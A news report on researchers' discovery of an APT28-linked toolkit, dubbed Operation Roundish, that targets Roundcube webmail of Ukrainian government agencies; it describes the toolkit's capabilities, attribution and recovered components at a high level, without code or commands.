Cybersecurity researchers have uncovered a sophisticated toolkit believed to be used by the Russian-linked hacking group APT28 in a campaign targeting Ukrainian government email systems.
The operation, dubbed “Operation Roundish,” was discovered in January 2026 by researchers at Hunt.io after an exposed open directory was identified on the server 203.161.50[.]145. The directory contained what appears to be a complete exploitation framework designed to target vulnerabilities in the Roundcube webmail platform often abused by threat actors due to its wide adoption.
Analysis of the exposed infrastructure revealed a comprehensive operational toolkit that included development and production cross-site scripting (XSS) payloads, a Flask-based command-and-control server, CSS injection tooling, and operator artifacts such as bash history logs.
Researchers also discovered a Go-based Linux implant deployed within a compromised Ukrainian web application, indicating that the attackers were able to establish persistence within at least one targeted environment.
The toolkit was designed to support a wide range of espionage activities against webmail systems. Researchers found capabilities enabling attackers to harvest user credentials, establish persistent mail forwarding rules, conduct bulk email exfiltration, steal address books, and extract two-factor authentication secrets. They also found an archive containing more than 1,070 files of exfiltrated victim data.
Technical analysis revealed strong similarities between the Roundish toolkit and the campaign known as Operation RoundPress previously documented by ESET. Researchers identified fourteen overlapping tactics, techniques, and procedures (TTPs), seven of which are considered distinctive and rarely observed outside of this actor’s operations. Based on the overlaps, analysts assess with medium-high confidence that the activity is linked to APT28.
Over the past several years, APT28 has systematically targeted webmail platforms in cyber-espionage operations aimed at government and defense organizations. The campaigns have exploited vulnerabilities in platforms such as Roundcube, Horde, MDaemon, and Zimbra. In many cases, attackers rely on XSS vulnerabilities to gain access to email accounts and collect messages, contacts, and authentication data.
While Roundish shares core characteristics with earlier operations, the toolkit also introduces capabilities not previously documented in APT28’s webmail-focused campaigns. One component implements a CSS selector side-channel technique designed to progressively extract CSRF tokens, enabling attackers to bypass certain webmail protections. Researchers also identified modules capable of stealing stored credentials from Chrome and Firefox browsers.
The architecture of the toolkit also appears more advanced than previously observed tooling associated with the group. Analysts noted that the framework is capable of running up to six simultaneous operations, significantly increasing the potential data collection impact of each execution compared with earlier tools that typically supported only two or three parallel actions. Bash history recovered from the exposed server further suggests that operators were actively developing scripts to detect containerized environments.
Evidence from the recovered infrastructure confirms that the operation targeted the Roundcube webmail instance used by the State Migration Service of Ukraine at mail.dmsu.gov.ua. The exposed directory ultimately allowed researchers to recover four main components of the Roundish toolkit: a credential phishing module named serverlast.py, XSS exploitation payloads stored as newworker.js and worklast.js, a CSS injection server called roundcube-css-exploit.js, and the Go-based persistence implant httd.
Earlier this week, ESET shared details of another APT28-linked campaign using custom malware implants, including a modified version of the open-source Covenant post-exploitation tool, to spy on Ukrainian organizations. The researchers noted that the group appears to have resumed advanced malware development.